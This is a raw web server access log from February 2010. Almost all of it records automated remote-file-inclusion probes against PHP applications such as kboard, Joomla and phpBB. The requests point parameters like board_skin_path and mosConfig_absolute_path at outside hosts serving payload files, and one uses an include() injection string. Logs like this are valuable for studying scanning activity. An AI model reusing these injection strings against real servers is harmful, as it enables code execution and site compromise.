200.93.147.154 - - [23/Feb/2010:02:21:44 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:21:54 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:21:59 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:22:09 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:22:09 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:22:12 -0500] "GET /logs/access_log.Q110020500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
209.172.33.230 - - [23/Feb/2010:02:22:12 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:22:22 -0500] "GET /logs/access_log.Q110021600%20%20//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
210.114.222.95 - - [23/Feb/2010:02:22:34 -0500] "GET /logs/access_log.Q109063000//akocomments.php?mosConfig_absolute_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
200.93.147.154 - - [23/Feb/2010:02:22:40 -0500] "GET /index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:02:22:40 -0500] "GET /logs/index.php?nic=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:22:41 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:22:46 -0500] "GET /logs/access_log.Q109052000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:02:22:48 -0500] "GET /logs/access_log.Q109121100/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:02:23:02 -0500] "GET /images/_notes/ace_bkgrd_white_r3_c1.jpg.mno HTTP/1.0" 200 256 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.86.155.18 - - [23/Feb/2010:02:23:16 -0500] "GET /logs/access_log.Q109110900/error.php?dir=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:23:19 -0500] "GET /logs/access_log.Q110020500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:23:19 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:23:50 -0500] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:23:50 -0500] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:02:23:53 -0500] "GET /logs/access_log.Q109102900/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:02:24:44 -0500] "GET /logs/error_log.Q110011000/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
121.254.172.27 - - [23/Feb/2010:02:24:45 -0500] "GET /http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.254.172.27 - - [23/Feb/2010:02:24:46 -0500] "GET /logs/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
211.239.124.204 - - [23/Feb/2010:02:24:56 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:24:56 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:24:56 -0500] "GET /logs/access_log.Q109080800//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.254.172.27 - - [23/Feb/2010:02:25:07 -0500] "GET /logs/access_log.Q109071900/http://klmz74.ru/poll/lang/history/is? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
211.239.124.204 - - [23/Feb/2010:02:25:07 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:25:07 -0500] "GET /logs/access_log.Q109080800//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:25:07 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:25:16 -0500] "GET /logs/access_log.Q109122400//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:25:27 -0500] "GET /logs/access_log.Q109122400//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:02:25:52 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.167.221.65 - - [23/Feb/2010:02:25:54 -0500] "GET //bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:25:54 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:25:56 -0500] "GET /logs/access_log.Q110020500%20%20//bbs//delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:26:25 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.254.98.142 - - [23/Feb/2010:02:26:25 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.254.98.142 - - [23/Feb/2010:02:26:46 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.254.98.142 - - [23/Feb/2010:02:26:47 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
206.63.65.14 - - [23/Feb/2010:02:26:59 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:27:00 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:27:00 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:02:27:09 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:02:27:09 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:02:27:09 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:27:37 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:27:37 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:27:39 -0500] "GET /logs/access_log.Q109101000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.219 - - [23/Feb/2010:02:27:40 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L11516E5700F16500152B093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.239.124.204 - - [23/Feb/2010:02:29:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:29:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:29:19 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:29:19 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
91.121.228.9 - - [23/Feb/2010:02:29:51 -0500] "GET /logs/access_log.Q109051700/errors.php?error=http://91.121.228.9/index2.html??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:02:29:51 -0500] "GET /errors.php?error=http://91.121.228.9/index2.html??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:02:29:51 -0500] "GET /logs/errors.php?error=http://91.121.228.9/index2.html??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:02:30:02 -0500] "GET /logs/access_log.Q109082500/errors.php?error=http://91.121.228.9/index2.html??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
188.130.32.85 - - [23/Feb/2010:02:30:31 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:02:31:00 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:02:31:00 -0500] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:31:07 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:02:31:07 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
206.63.65.14 - - [23/Feb/2010:02:31:07 -0500] "GET /logs/access_log.Q109110300//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:31:08 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:31:08 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:21 -0500] "GET /logs/error_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:21 -0500] "GET /logs/access_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:21 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:21 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:31:33 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:31:36 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:31:36 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:31:36 -0500] "GET /logs/error_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:31:38 -0500] "GET /logs/access_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:59 -0500] "GET /logs/access_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
213.251.189.205 - - [23/Feb/2010:02:31:59 -0500] "GET /logs/error_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:32:20 -0500] "GET /logs/access_log.Q109082900%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:32:21 -0500] "GET /logs/access_log.Q109101000%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:02:32:21 -0500] "GET /logs/access_log.Q109101200%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:32:38 -0500] "GET /logs/access_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:02:32:38 -0500] "GET /logs/error_log.Q109090500////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
84.38.160.77 - - [23/Feb/2010:02:32:50 -0500] "GET /logs//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.76"
84.38.160.77 - - [23/Feb/2010:02:32:50 -0500] "GET /logs/access_log.Q110021600//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.76"
84.38.160.77 - - [23/Feb/2010:02:32:50 -0500] "GET //templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.76"
202.125.152.246 - - [23/Feb/2010:02:32:57 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:33:05 -0500] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
202.125.152.246 - - [23/Feb/2010:02:33:08 -0500] "GET /logs/access_log.Q109052000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://downloadgogo.com/osCommerce/catalog/pub/idxx.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:18 -0500] "GET /logs/access_log.Q110021600//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:19 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:20 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:20 -0500] "GET /logs/access_log.Q110021600//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:33:24 -0500] "GET /logs/access_log.Q109082900%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:33:33 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:33:33 -0500] "GET /logs/error_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:33:33 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:02:33:34 -0500] "GET /logs/access_log.Q109053000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:02:33:35 -0500] "GET /logs/access_log.Q109091000//common/db.php?commonpath=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:33:37 -0500] "GET //component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.254.98.142 - - [23/Feb/2010:02:33:37 -0500] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 245 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.167.221.65 - - [23/Feb/2010:02:33:39 -0500] "GET /logs/access_log.Q109090500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
84.38.160.77 - - [23/Feb/2010:02:33:44 -0500] "GET /logs/error_log.Q110021600//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
209.59.12.99 - - [23/Feb/2010:02:33:55 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.239.124.204 - - [23/Feb/2010:02:34:05 -0500] "GET //skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:34:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.239.124.204 - - [23/Feb/2010:02:34:05 -0500] "GET /logs/access_log.Q110021600%20%20//skin/zero_vote/error.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:34:59 -0500] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:34:59 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
189.108.172.26 - - [23/Feb/2010:02:34:59 -0500] "GET /logs/error_log.Q110021600//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
216.211.138.220 - - [23/Feb/2010:02:35:21 -0500] "GET //component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
216.211.138.220 - - [23/Feb/2010:02:35:21 -0500] "GET /logs//component/option,com_frontpage/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:35:29 -0500] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:35:29 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:35:29 -0500] "GET /logs/access_log.Q110021600%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:02:35:30 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:02:35:30 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
58.230.162.220 - - [23/Feb/2010:02:35:32 -0500] "GET /logs//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:35:32 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:02:35:32 -0500] "GET /logs/access_log.Q110021600%20%20//bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:02:36:14 -0500] "GET //bbs/delete_comment.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
